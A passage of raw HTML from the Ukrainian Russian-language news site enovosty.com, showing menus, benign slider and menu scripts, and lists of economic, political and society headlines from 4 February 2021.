Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li class="current-menu-item"><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li><li id="menu-item-4513417" ><a href="https://enovosty.com/specproekty/rynok-zemli">Рынок земли</a></li><li id="menu-item-4513417" ><a href="https://enovosty.com/tag/COVID-19">COVID-19</a></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/news_society/full/402-na-dnepropetrovshhine-proxodyat-moshhnye-voennye-ucheniya-93-j-ombr-xolodnyj-yar-foto" title="На Днепропетровщине проходят мощные военные учения 93-й ОМБр Холодный Яр (ФОТО)"><img width="210" height="156" alt="На Днепропетровщине проходят мощные военные учения 93-й ОМБр Холодный Яр (ФОТО)" src="https://enovosty.com/wp-content/uploads/2021/02/650x434-2.jpg"></a><a href="https://enovosty.com/news_society/full/402-na-dnepropetrovshhine-proxodyat-moshhnye-voennye-ucheniya-93-j-ombr-xolodnyj-yar-foto" title="На Днепропетровщине проходят мощные военные учения 93-й ОМБр Холодный Яр (ФОТО)" class="name">На Днепропетровщине проходят мощные военные учения 93-й ОМБр "Холодный Яр" (ФОТО) <span>(1064)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news_economy/full/402-stalo-izvestno-kogda-ukraincev-ozolotyat-polskimi-zarplatami" title="Стало известно, когда украинцев озолотят польскими зарплатами"><img width="210" height="156" alt="Стало известно, когда украинцев озолотят польскими зарплатами" src="https://enovosty.com/wp-content/uploads/2021/02/92139-1_large-e1612446110541.jpg"></a><a href="https://enovosty.com/news_economy/full/402-stalo-izvestno-kogda-ukraincev-ozolotyat-polskimi-zarplatami" title="Стало известно, когда украинцев озолотят польскими зарплатами" class="name">Стало известно, когда украинцев "озолотят" польскими зарплатами <span>(1212)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news-auto/full/402-v-ukraine-sobirayutsya-vnesti-izmeneniya-v-voditelskie-prava" title="В Украине собираются внести изменения в водительские права"><img width="210" height="156" alt="В Украине собираются внести изменения в водительские права" src="https://enovosty.com/wp-content/uploads/2021/02/voditelskie-prav-600x338-e1612430536430.jpg"></a><a href="https://enovosty.com/news-auto/full/402-v-ukraine-sobirayutsya-vnesti-izmeneniya-v-voditelskie-prava" title="В Украине собираются внести изменения в водительские права" class="name">В Украине собираются внести изменения в водительские права <span>(1732)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/news_society/full/402-ukraincy-skoro-smogut-izmenit-svoe-mesto-registracii-za-neskolko-minut" title="Украинцы скоро смогут изменить свое место регистрации за несколько минут"><img width="210" height="156" alt="Украинцы скоро смогут изменить свое место регистрации за несколько минут" src="https://enovosty.com/wp-content/uploads/2021/02/screenshot_18-e1612430338890.jpg"></a><a href="https://enovosty.com/news_society/full/402-ukraincy-skoro-smogut-izmenit-svoe-mesto-registracii-za-neskolko-minut" title="Украинцы скоро смогут изменить свое место регистрации за несколько минут" class="name">Украинцы скоро смогут изменить свое место регистрации за несколько минут <span>(6516)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news_economy/full/402-pensii-v-ukraine-dolzhny-byt-v-dva-raza-vyshe-nazvana-realnaya-cifra" title="Пенсии в Украине должны быть в два раза выше. Названа реальная цифра"><img width="210" height="156" alt="Пенсии в Украине должны быть в два раза выше. Названа реальная цифра" src="https://enovosty.com/wp-content/uploads/2021/02/39_main.jpg"></a><a href="https://enovosty.com/news_economy/full/402-pensii-v-ukraine-dolzhny-byt-v-dva-raza-vyshe-nazvana-realnaya-cifra" title="Пенсии в Украине должны быть в два раза выше. Названа реальная цифра" class="name">Пенсии в Украине должны быть в два раза выше. Названа реальная цифра <span>(2192)</span></a></li></ul></li><li><ul class="tact"><li id="li5" style="width:210px;"><a href="https://enovosty.com/news_society/full/402-v-ukraine-oslabyat-karantin-kakie-ogranicheniya-budut-dejstvovat" title="В Украине ослабят карантин. Какие ограничения будут действовать"><img width="210" height="156" alt="В Украине ослабят карантин. Какие ограничения будут действовать" src="https://enovosty.com/wp-content/uploads/2021/02/shmygal3.jpg"></a><a href="https://enovosty.com/news_society/full/402-v-ukraine-oslabyat-karantin-kakie-ogranicheniya-budut-dejstvovat" title="В Украине ослабят карантин. Какие ограничения будут действовать" class="name">В Украине ослабят карантин. Какие ограничения будут действовать <span>(3600)</span></a></li></ul></li><li><ul class="tact"><li id="li6" style="width:210px;"><a href="https://enovosty.com/news_society/full/302-sem-stolichnyx-proektov-nominirovany-na-arxitekturnuyu-premiyu-es" title="Семь столичных проектов номинированы на архитектурную премию ЕС"><img width="210" height="156" alt="Семь столичных проектов номинированы на архитектурную премию ЕС" src="https://enovosty.com/wp-content/uploads/2021/02/a6a393fce4e78c1eca83afd935a51c686aa76-e1612346273678.jpeg"></a><a href="https://enovosty.com/news_society/full/302-sem-stolichnyx-proektov-nominirovany-na-arxitekturnuyu-premiyu-es" title="Семь столичных проектов номинированы на архитектурную премию ЕС" class="name">Семь столичных проектов номинированы на архитектурную премию ЕС <span>(6092)</span></a></li></ul></li><li><ul class="tact"><li id="li7" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/402-v-nebo-vpervye-podnyalsya-potencialno-samyj-tyazhelovooruzhennyj-istrebitel-v-mire-foto" title="В небо впервые поднялся самый тяжеловооруженный истребитель в мире (ФОТО)"><img width="210" height="156" alt="В небо впервые поднялся самый тяжеловооруженный истребитель в мире (ФОТО)" src="https://enovosty.com/wp-content/uploads/2021/02/f-15ex-first-flight-1-e1612367292591.jpg"></a><a href="https://enovosty.com/news_abroad/full/402-v-nebo-vpervye-podnyalsya-potencialno-samyj-tyazhelovooruzhennyj-istrebitel-v-mire-foto" title="В небо впервые поднялся самый тяжеловооруженный истребитель в мире (ФОТО)" class="name">В небо впервые поднялся самый тяжеловооруженный истребитель в мире (ФОТО) <span>(17140)</span></a></li></ul></li><li><ul class="tact"><li id="li8" style="width:210px;"><a href="https://enovosty.com/news_society/full/302-ruka-bajdena-i-protivodejstvii-chuzherodnoj-propagande-reakciya-obshhestva-na-sankcii-protiv-kanalov-medvedchuka" title="Рука Байдена и противодействие фейкам и пропаганде: Реакция общества на санкции против каналов Медведчука"><img width="210" height="156" alt="Рука Байдена и противодействие фейкам и пропаганде: Реакция общества на санкции против каналов Медведчука" src="https://enovosty.com/wp-content/uploads/2021/02/kanal.jpg"></a><a href="https://enovosty.com/news_society/full/302-ruka-bajdena-i-protivodejstvii-chuzherodnoj-propagande-reakciya-obshhestva-na-sankcii-protiv-kanalov-medvedchuka" title="Рука Байдена и противодействие фейкам и пропаганде: Реакция общества на санкции против каналов Медведчука" class="name">Рука Байдена и противодействие фейкам и пропаганде: Реакция общества на санкции против каналов Медведчука <span>(6516)</span></a></li></ul></li><li><ul class="tact"><li id="li9" style="width:210px;"><a href="https://enovosty.com/news_society/full/302-rada-planiruet-uzhestochit-nakazanie-za-domashnee-nasilie" title="Рада планирует ужесточить наказание за домашнее насилие"><img width="210" height="156" alt="Рада планирует ужесточить наказание за домашнее насилие" src="https://enovosty.com/wp-content/uploads/2021/02/1200px-1_verhovna_rada_ukrayini_vadim_chuprina_©.jpg"></a><a href="https://enovosty.com/news_society/full/302-rada-planiruet-uzhestochit-nakazanie-za-domashnee-nasilie" title="Рада планирует ужесточить наказание за домашнее насилие" class="name">Рада планирует ужесточить наказание за домашнее насилие <span>(1568)</span></a></li></ul></li><li><ul class="tact"><li id="li10" style="width:210px;"><a href="https://enovosty.com/news_economy/full/302-v-ukraine-sobirayutsya-pereschitat-prozhitochnyj-minimum-ozvuchena-formula" title="В Украине собираются пересчитать прожиточный минимум: озвучена формула"><img width="210" height="156" alt="В Украине собираются пересчитать прожиточный минимум: озвучена формула" src="https://enovosty.com/wp-content/uploads/2021/02/screenshot_3-1-e1612343991217.jpg"></a><a href="https://enovosty.com/news_economy/full/302-v-ukraine-sobirayutsya-pereschitat-prozhitochnyj-minimum-ozvuchena-formula" title="В Украине собираются пересчитать прожиточный минимум: озвучена формула" class="name">В Украине собираются пересчитать прожиточный минимум: озвучена формула <span>(1196)</span></a></li></ul></li><li><ul class="tact"><li id="li11" style="width:210px;"><a href="https://enovosty.com/news_society/full/302-ochen-vazhnyj-signal-ukrainskaya-razvedka-nakonec-to-otxodit-ot-praktik-kgb-atlantic-council" title="Очень важный сигнал: Украинская разведка наконец-то отходит от практик КГБ, - Atlantic Council"><img width="210" height="156" alt="Очень важный сигнал: Украинская разведка наконец-то отходит от практик КГБ, - Atlantic Council" src="https://enovosty.com/wp-content/uploads/2021/02/razvedka.jpg"></a><a href="https://enovosty.com/news_society/full/302-ochen-vazhnyj-signal-ukrainskaya-razvedka-nakonec-to-otxodit-ot-praktik-kgb-atlantic-council" title="Очень важный сигнал: Украинская разведка наконец-то отходит от практик КГБ, - Atlantic Council" class="name">"Очень важный сигнал": Украинская разведка наконец-то отходит от практик КГБ, - Atlantic Council <span>(12944)</span></a></li></ul></li><li><ul class="tact"><li id="li12" style="width:210px;"><a href="https://enovosty.com/news-culture/full/302-starshaya-shkola-stanet-trexletnej-chto-izmenitsya-dlya-ukrainskix-shkolnikov" title="Три года в старшей школе: что изменится для украинских школьников"><img width="210" height="156" alt="Три года в старшей школе: что изменится для украинских школьников" src="https://enovosty.com/wp-content/uploads/2021/02/shkola-696x391-e1612280735717.jpg"></a><a href="https://enovosty.com/news-culture/full/302-starshaya-shkola-stanet-trexletnej-chto-izmenitsya-dlya-ukrainskix-shkolnikov" title="Три года в старшей школе: что изменится для украинских школьников" class="name">Три года в старшей школе: что изменится для украинских школьников <span>(12208)</span></a></li></ul></li><li><ul class="tact"><li id="li13" style="width:210px;"><a href="https://enovosty.com/news_politics/full/302-sankcii-v-dejstvii-translyaciyu-kanalov-medvedchuka-odin-za-drugim-prekrashhayut-servisy-na-vsex-platformax" title="Санкции в действии: Трансляцию каналов Медведчука один за другим прекращают сервисы на всех платформах"><img width="210" height="156" alt="Санкции в действии: Трансляцию каналов Медведчука один за другим прекращают сервисы на всех платформах" src="https://enovosty.com/wp-content/uploads/2021/02/kanaly.jpg"></a><a href="https://enovosty.com/news_politics/full/302-sankcii-v-dejstvii-translyaciyu-kanalov-medvedchuka-odin-za-drugim-prekrashhayut-servisy-na-vsex-platformax" title="Санкции в действии: Трансляцию каналов Медведчука один за другим прекращают сервисы на всех платформах" class="name">Санкции в действии: Трансляцию каналов Медведчука один за другим прекращают сервисы на всех платформах <span>(8404)</span></a></li></ul></li><li><ul class="tact"><li id="li14" style="width:210px;"><a href="https://enovosty.com/news-auto/full/302-top-10-samyx-populyarnyx-novyx-avto-sredi-ukraincev-v-yanvare" title="ТОП-10 самых популярных новых авто среди украинцев в январе"><img width="210" height="156" alt="ТОП-10 самых популярных новых авто среди украинцев в январе" src="https://enovosty.com/wp-content/uploads/2021/02/29_main-e1612260269600.jpeg"></a><a href="https://enovosty.com/news-auto/full/302-top-10-samyx-populyarnyx-novyx-avto-sredi-ukraincev-v-yanvare" title="ТОП-10 самых популярных новых авто среди украинцев в январе" class="name">ТОП-10 самых популярных новых авто среди украинцев в январе <span>(2308)</span></a></li></ul></li></ul></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Новости экономики</p></div><div class='cls'></div><span class='news_date'>04.02.2021 г.</span><br /><div class="post_news"><span id="post-4834948"><span class="postDate">21:49</span><a class="postTitle" href="https://enovosty.com/news_economy/full/402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu">Замглавы НБУ Дмитрий Сологуб, получая по 300 тыс. грн, прогуливает работу, а в офисе играет в теннис - сотрудники НБУ</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4834875"><span class="postDate">15:45</span><a class="postTitle" href="https://enovosty.com/news_economy/full/402-stalo-izvestno-kogda-ukraincev-ozolotyat-polskimi-zarplatami">Стало известно, когда украинцев "озолотят" польскими зарплатами</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4834871"><span class="postDate">13:52</span><a class="postTitle" href="https://enovosty.com/news_economy/full/402-kogo-v-ukraine-oboshlo-storonoj-poslednee-povyshenie-pensij">Кого в Украине обошло стороной последнее повышение пенсий</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4834801"><span class="postDate">11:45</span><a class="postTitle" href="https://enovosty.com/news_economy/full/402-v-nbu-priznali-vsplesk-inflyacii-chto-podorozhaet-v-2021-m">В НБУ признали "всплеск инфляции": Что подорожает в 2021-м?</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4834797"><span class="postDate">10:33</span><a class="postTitle" href="https://enovosty.com/news_economy/full/402-glava-pravleniya-cherkassyoblenergo-oleg-samchuk-vystupil-za-prekrashhenie-bankrotstva-predpriyatiya">Глава правления "Черкассыоблэнерго" Олег Самчук выступил за прекращение банкротства предприятия</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4834788"><span class="postDate">09:43</span><a class="postTitle" href="https://enovosty.com/news_economy/full/402-ekspert-ozvuchil-interesnyj-prognoz-po-sudbe-gazoprovod-severnogo-potoka-2">Эксперт озвучил интересный прогноз по судьбе газопровода "Северный поток-2"</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4834786"><span class="postDate">09:14</span><a class="postTitle" href="https://enovosty.com/news_economy/full/402-pensii-v-ukraine-dolzhny-byt-v-dva-raza-vyshe-nazvana-realnaya-cifra">Пенсии в Украине должны быть в два раза выше. Названа реальная цифра</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/news_economy">Все новости экономики</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">01.02.2021</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/3101-itogi-yanvarya-istoricheskij-shans-dlya-evropy-donbasskij-syur-i-bronevik-navalnogo">Итоги января: Исторический шанс для Европы, Донбасский сюр и броневик Навального</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/3101-itogi-yanvarya-istoricheskij-shans-dlya-evropy-donbasskij-syur-i-bronevik-navalnogo"><img width="230" alt="Итоги января: Исторический шанс для Европы, Донбасский сюр и броневик Навального" src="/wp-content/uploads/2021/01/f692704-2564629-e1612112267241.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/3101-itogi-yanvarya-istoricheskij-shans-dlya-evropy-donbasskij-syur-i-bronevik-navalnogo">Соединенные Штаты получили нового президента, который уже активно начал выполнять свои обязанности, развитые страны прививаются от коронавируса, а в ...</a></span></div><div class="block"><div class="info"><span class="postDate">30.01.2021</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/3001-ukroboronprom-taki-gotovyat-k-deribanu">"Реформа" Укроборонпрома: кому выгодно уничтожение оборонно-промышленного комплекса Украины</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/3001-ukroboronprom-taki-gotovyat-k-deribanu"><img width="230" alt="Реформа Укроборонпрома: кому выгодно уничтожение оборонно-промышленного комплекса Украины" src="/wp-content/uploads/2021/01/ukroboronprom-1.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/3001-ukroboronprom-taki-gotovyat-k-deribanu">Тему "реформирования" оборонно-промышленного комплекса (ОПК) Украины приходится срочно продолжить, так как подтверждаются опасения, высказанные в недавнем ...</a></span></div><div class="block"><div class="info"><span class="postDate">28.01.2021</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/ekonomika/full/2801-yuzhmash-vzletit-ili-upadet">Южмаш: взлетит или упадет ведущее ракетно-космическое предприятие Украины?</a></p><div class="cblock"><a href="https://enovosty.com/ekonomika/full/2801-yuzhmash-vzletit-ili-upadet"><img width="230" alt="Южмаш: взлетит или упадет ведущее ракетно-космическое предприятие Украины?" src="/wp-content/uploads/2021/01/yuzhmash.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/ekonomika/full/2801-yuzhmash-vzletit-ili-upadet">Среди остатков изрядно потрепанного и устаревшего советского хай-тека особое место занимает некогда бывшее флагманом мирового ракетно-космического машиностроения ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>04.02.2021 г.</span><br /><div class="post_news"> <span id="post-4834906"> <span class="postDate">23:02</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/402-saudity-povysili-ceny-na-neft-dlya-ssha-i-evropy">Саудиты повысили цены на нефть</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834922"> <span class="postDate">23:00</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/402-v-ukraine-sozdadut-portal-dlya-anonimnyx-donosov-o-korrupcii">В Украине создадут портал для анонимных доносов о коррупции</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834944"> <span class="postDate">21:59</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/402-germaniya-ushla-pod-vodu-video">Германия ушла под воду (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834948"> <span class="postDate">21:49</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu">Замглавы НБУ Дмитрий Сологуб, получая по 300 тыс. грн, прогуливает работу, а в офисе играет в теннис - сотрудники НБУ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834949"> <span class="postDate">21:49</span> <a class="postTitle" href="https://enovosty.com/news_society/full/402-zhiteli-ordlo-mogut-besplatno-lechitsya-ot-covid-19-v-ukraine">Жители ОРДЛО могут бесплатно лечиться от COVID-19 в Украине, - Ляшко</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834937"> <span class="postDate">21:18</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/402-ukrainec-smasteril-originalnyj-elektrokar-foto">Украинец смастерил оригинальный электрокар (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834837"> <span class="postDate">21:10</span> <a class="postTitle" href="https://enovosty.com/news_society/full/402-kak-vyglyadeli-realnye-passazhiry-i-komanda-titanika-i-kak-slozhilis-ix-sudby-posle-krusheniya-foto">Как выглядели реальные пассажиры и команда "Титаника" и как сложились их судьбы после крушения (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834898"> <span class="postDate">20:58</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/402-v-grecii-proizoshel-moshhnyj-vzryv-v-otele-video">В Греции произошел мощный взрыв в отеле (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834929"> <span class="postDate">20:43</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/402-u-nas-demokratiya-ya-deputatu-ne-zapreshhu-vmeshivatsya-v-amerikanskie-vybory-glava-partii-sluga-naroda-kornienko">"У нас демократия. Я депутату не запрещу вмешиваться в американские выборы", - глава партии "Слуга народа" Корниенко</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834930"> <span class="postDate">20:19</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/402-rybak-nashel-zhemchuzhinu-stoimostyu-v-300-tysyach-dollarov">Рыбак нашел жемчужину стоимостью в 300 тысяч долларов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834924"> <span class="postDate">19:58</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/402-vo-francii-proxodit-obshhenacionalnaya-zabastovka-foto">Во Франции проходит общенациональная забастовка (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834920"> <span class="postDate">19:19</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/402-ukraina-budet-postavlyat-moloko-v-livan">Украина будет поставлять молоко в Ливан</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834873"> <span class="postDate">19:00</span> <a class="postTitle" href="https://enovosty.com/news_society/full/402-v-ssha-sluchajno-obyavili-v-rozysk-geroya-filma-uzhasov-kuklu-chaki">В США случайно объявили в розыск героя фильма ужасов куклу Чаки</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834913"> <span class="postDate">18:58</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/402-daniil-bogatyrev-poyavlenie-u-ukrainy-letalnogo-oruzhiya-ne-smozhet-izmenit-situaciyu-na-donbasse">Даниил Богатырев: "Появление у Украины летального оружия не сможет изменить ситуацию на Донбассе"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834908"> <span class="postDate">18:48</span> <a class="postTitle" href="https://enovosty.com/news_society/full/402-obespechivaet-li-noshenie-dvux-masok-bolshuyu-zashhitu-ot-covid-19">"Обеспечивает ли ношение двух масок большую защиту от COVID-19?": советы медиков</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834901"> <span class="postDate">17:49</span> <a class="postTitle" href="https://enovosty.com/news_society/full/402-sbu-blokirovala-masshtabnuyu-sxemu-sbyta-kontrafaktnogo-goryuchego">СБУ блокировала масштабную схему сбыта контрафактного горючего</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834894"> <span class="postDate">17:31</span> <a class="postTitle" href="https://enovosty.com/news_society/full/402-stala-izvestna-nastoyashhaya-prichina-smerti-chingisxana">Стала известна настоящая причина смерти Чингисхана</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834889"> <span class="postDate">17:15</span> <a class="postTitle" href="https://enovosty.com/news_society/full/402-na-dnepropetrovshhine-proxodyat-moshhnye-voennye-ucheniya-93-j-ombr-xolodnyj-yar-foto">На Днепропетровщине проходят мощные военные учения 93-й ОМБр "Холодный Яр" (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834884"> <span class="postDate">16:56</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/402-my-na-krayu-socialnoj-i-ekonomicheskoj-propasti-i-ya-ne-budu-raskachivat-sistemu-dubinskij-video">Мы на краю социальной и экономической пропасти. И я не буду раскачивать систему, - Дубинский (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834883"> <span class="postDate">16:55</span> <a class="postTitle" href="https://enovosty.com/news_society/full/402-kiberpoliciya-blokirovala-deyatelnost-krupnejshego-v-mire-fishingovogo-servisa-video">Киберполиция блокировала деятельность крупнейшего в мире украинского фишингового сервиса (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834881"> <span class="postDate">16:41</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/402-v-ukraine-rastet-populyarnost-kofe">В Украине стремительно растет популярность кофе</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834878"> <span class="postDate">16:02</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/402-vo-francii-silnoe-navodnenie-foto">Во Франции сильное наводнение: людей массово эвакуируют (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834877"> <span class="postDate">15:59</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/402-zhdyom-ugolovnoe-delo-po-kozaku-inache-sankcii-eto-reakciya-na-padayushhij-rejting-zelenogo-goncharenko-video">Ждём уголовное дело по Козаку, иначе санкции - это реакция на падающий рейтинг Зеленского, - Гончаренко (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834875"> <span class="postDate">15:45</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/402-stalo-izvestno-kogda-ukraincev-ozolotyat-polskimi-zarplatami">Стало известно, когда украинцев "озолотят" польскими зарплатами</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834826"> <span class="postDate">15:40</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/402-bloger-pokazal-neobychnyj-sposob-bystro-vosstanovit-obonyanie-posle-covid-19">Блогер показал необычный способ быстро восстановить обоняние после COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834823"> <span class="postDate">15:20</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/402-v-ukraine-sobirayutsya-vnesti-izmeneniya-v-voditelskie-prava">В Украине собираются внести изменения в водительские права</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834794"> <span class="postDate">15:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/402-kitajskaya-armiya-poluchila-legkie-tanki-novogo-tipa-type-15">Китайская армия получила легкие танки нового типа Type 15</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834821"> <span class="postDate">14:40</span> <a class="postTitle" href="https://enovosty.com/news_society/full/402-ukraincy-skoro-smogut-izmenit-svoe-mesto-registracii-za-neskolko-minut">Украинцы скоро смогут изменить свое место регистрации за несколько минут</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834817"> <span class="postDate">14:20</span> <a class="postTitle" 